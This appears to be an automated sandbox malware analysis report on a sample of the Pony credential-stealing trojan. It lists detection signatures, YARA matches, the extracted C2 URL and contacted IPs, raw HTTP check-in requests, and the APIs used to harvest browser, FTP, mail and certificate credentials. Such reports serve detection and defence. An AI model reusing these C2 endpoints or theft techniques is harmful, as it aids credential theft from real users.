Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AxgZVzUv8m.exe

Overview

General Information

Sample name:AxgZVzUv8m.exe
renamed because original name is a hash value
Original sample name:0dc91d39870a081f44b8429dcfbc223f.exe
Analysis ID:1495035
MD5:0dc91d39870a081f44b8429dcfbc223f
SHA1:2033cf336c22ca200e212333a4ebecfc25eeb43f
SHA256:f1114e448e0d95855b4124a0cc4fc0b601e187db29ec697128bee4d776c6eccb
Tags:exePony
Infos:

Detection

Pony
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Pony
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Injects a PE file into a foreign processes
Machine Learning detection for sample
Pony trojan / infostealer detected
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AxgZVzUv8m.exe (PID: 4004 cmdline: "C:\Users\user\Desktop\AxgZVzUv8m.exe" MD5: 0DC91D39870A081F44B8429DCFBC223F)
    • AxgZVzUv8m.exe (PID: 2744 cmdline: "C:\Users\user\Desktop\AxgZVzUv8m.exe" MD5: 0DC91D39870A081F44B8429DCFBC223F)
      • cmd.exe (PID: 4536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EvilPony, PonyshePrivately modded version of the Pony stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Malware Configuration

Threatname: Pony

{"C2 list": ["http://dillion0mill.favcc1.com/gate.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PonyYara detected PonyJoe Security
      00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Pony_d5516fe8unknownunknown
      • 0x16606:$a1: \Global Downloader
      • 0x15d8f:$a2: wiseftpsrvs.bin
      • 0x16466:$a3: SiteServer %d\SFTP
      • 0x1645a:$a4: %s\Keychain
      • 0x166c4:$a5: Connections.txt
      • 0x16a0b:$a6: ftpshell.fsi
      • 0x17166:$a7: inetcomm server passwords
      00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpponyIdentify PonyBrian Wallace @botnet_hunter
      • 0x14f91:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x171ad:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x147b3:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
      • 0x14dd4:$s3: POST %s HTTP/1.0
      • 0x14dfd:$s4: Accept-Encoding: identity, *;q=0
      • 0x14f0a:$s4: Accept-Encoding: identity, *;q=0
      00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpFareitFareit Payloadkevoreilly
      • 0x173fc:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
      Click to see the 4 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.AxgZVzUv8m.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        3.2.AxgZVzUv8m.exe.400000.0.unpackJoeSecurity_PonyYara detected PonyJoe Security
          3.2.AxgZVzUv8m.exe.400000.0.unpackWindows_Trojan_Pony_d5516fe8unknownunknown
          • 0x16606:$a1: \Global Downloader
          • 0x15d8f:$a2: wiseftpsrvs.bin
          • 0x16466:$a3: SiteServer %d\SFTP
          • 0x1645a:$a4: %s\Keychain
          • 0x166c4:$a5: Connections.txt
          • 0x16a0b:$a6: ftpshell.fsi
          • 0x17166:$a7: inetcomm server passwords
          3.2.AxgZVzUv8m.exe.400000.0.unpackponyIdentify PonyBrian Wallace @botnet_hunter
          • 0x14f91:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
          • 0x171ad:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
          • 0x147b3:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
          • 0x14dd4:$s3: POST %s HTTP/1.0
          • 0x14dfd:$s4: Accept-Encoding: identity, *;q=0
          • 0x14f0a:$s4: Accept-Encoding: identity, *;q=0
          3.2.AxgZVzUv8m.exe.400000.0.unpackFareitFareit Payloadkevoreilly
          • 0x173fc:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          Timestamp:2024-08-19T16:43:43.578383+0200
          SID:2014562
          Severity:1
          Source Port:49708
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-08-19T16:43:44.649406+0200
          SID:2014562
          Severity:1
          Source Port:49710
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: AxgZVzUv8m.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://dillion0mill.favcc1.com/gate.phphttp://dillion0mill.favcc1.com/gate.phpYUIPWDFILE0YUIPKDFILE0Avira URL Cloud: Label: malware
          Source: http://ww25.dillion0mill.favcc1.com/gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940Avira URL Cloud: Label: malware
          Source: http://dillion0mill.favcc1.com/gate.phpAvira URL Cloud: Label: malware
          Found malware configuration
          Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpackMalware Configuration Extractor: Pony {"C2 list": ["http://dillion0mill.favcc1.com/gate.php"]}
          Multi AV Scanner detection for submitted file
          Source: AxgZVzUv8m.exeReversingLabs: Detection: 60%
          Yara detected Pony
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
          Machine Learning detection for sample
          Source: AxgZVzUv8m.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,3_2_0040A712
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,3_2_0040D3BE
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,3_2_0040BC36
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040A557 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,3_2_0040A557
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,3_2_0040A96D
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,3_2_0040CE3D
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,3_2_0040AB24
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004043DC CryptUnprotectData,LocalFree,3_2_004043DC
          Source: AxgZVzUv8m.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
          Source: AxgZVzUv8m.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: G:\Projects\DLL3\DLL3\obj\Release\Dll.pdb source: AxgZVzUv8m.exe, 00000000.00000002.1594363293.0000000006990000.00000004.08000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,3_2_004051E3
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_004041A6
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,3_2_00404E73
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_00408AE5
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,3_2_00409832
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,3_2_00408961
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.8:49708 -> 103.224.212.212:80
          Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.8:49708 -> 103.224.212.212:80
          Source: Network trafficSuricata IDS: 2014234 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 3 : 192.168.2.8:49710 -> 199.59.243.226:80
          Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.8:49710 -> 199.59.243.226:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://dillion0mill.favcc1.com/gate.php
          Source: Joe Sandbox ViewIP Address: 103.224.212.212 103.224.212.212
          Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
          Source: Joe Sandbox ViewIP Address: 199.59.243.226 199.59.243.226
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: global trafficHTTP traffic detected: GET /gate.php HTTP/1.0Host: dillion0mill.favcc1.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
          Source: global trafficHTTP traffic detected: GET /gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940 HTTP/1.0Host: ww25.dillion0mill.favcc1.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /gate.php HTTP/1.0Host: dillion0mill.favcc1.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
          Source: global trafficHTTP traffic detected: GET /gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940 HTTP/1.0Host: ww25.dillion0mill.favcc1.comAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: AxgZVzUv8m.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: dillion0mill.favcc1.com
          Source: global trafficDNS traffic detected: DNS query: ww25.dillion0mill.favcc1.com
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
          Source: AxgZVzUv8m.exe, AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://dillion0mill.favcc1.com/gate.php
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://dillion0mill.favcc1.com/gate.phphttp://dillion0mill.favcc1.com/gate.phpYUIPWDFILE0YUIPKDFILE0
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ftp://operawand.dat_Software
          Source: AxgZVzUv8m.exe, AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: AxgZVzUv8m.exe, 00000003.00000002.1644544434.0000000000D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live

          E-Banking Fraud

          barindex
          Yara detected Pony
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
          Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
          Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
          Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Fareit Payload Author: kevoreilly
          Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
          Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Fareit Payload Author: kevoreilly
          Source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
          Source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTRMatched rule: Identify Pony Author: Brian Wallace @botnet_hunter
          Pony trojan / infostealer detected
          Source: Signatures Results: All Signatures
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 0_2_00AB0B580_2_00AB0B58
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_004121E93_2_004121E9
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00402EFD3_2_00402EFD
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: String function: 00404351 appears 51 times
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: String function: 00401D71 appears 139 times
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: String function: 00410808 appears 42 times
          Source: AxgZVzUv8m.exe, 00000000.00000002.1591410932.0000000003755000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSCAN_DOC_201407150011693-pdf.exe0 vs AxgZVzUv8m.exe
          Source: AxgZVzUv8m.exe, 00000000.00000002.1590463072.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs AxgZVzUv8m.exe
          Source: AxgZVzUv8m.exe, 00000000.00000000.1585208750.0000000000066000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSCAN_DOC_201407150011693-pdf.exe0 vs AxgZVzUv8m.exe
          Source: AxgZVzUv8m.exe, 00000000.00000002.1591303091.00000000026C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs AxgZVzUv8m.exe
          Source: AxgZVzUv8m.exe, 00000000.00000002.1594363293.0000000006990000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDll.dll, vs AxgZVzUv8m.exe
          Source: AxgZVzUv8m.exeBinary or memory string: OriginalFilenameSCAN_DOC_201407150011693-pdf.exe0 vs AxgZVzUv8m.exe
          Source: AxgZVzUv8m.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
          Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
          Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
          Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
          Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
          Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Fareit author = kevoreilly, description = Fareit Payload, cape_type = Fareit Payload
          Source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
          Source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
          Source: AxgZVzUv8m.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,3_2_0040D3BE
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 0_2_06750DF2 AdjustTokenPrivileges,0_2_06750DF2
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,3_2_00402968
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: 3_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,3_2_00402CE7
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile created: C:\Users\user\AppData\Local\Temp\7041625.batJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "
          Source: AxgZVzUv8m.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: AxgZVzUv8m.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: AxgZVzUv8m.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile read: C:\Users\user\Desktop\AxgZVzUv8m.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\AxgZVzUv8m.exe "C:\Users\user\Desktop\AxgZVzUv8m.exe"
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess created: C:\Users\user\Desktop\AxgZVzUv8m.exe "C:\Users\user\Desktop\AxgZVzUv8m.exe"
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess created: C:\Users\user\Desktop\AxgZVzUv8m.exe "C:\Users\user\Desktop\AxgZVzUv8m.exe"Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7041625.bat" "C:\Users\user\Desktop\AxgZVzUv8m.exe" "Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeSection loaded: mscoree.dllJump to behavior
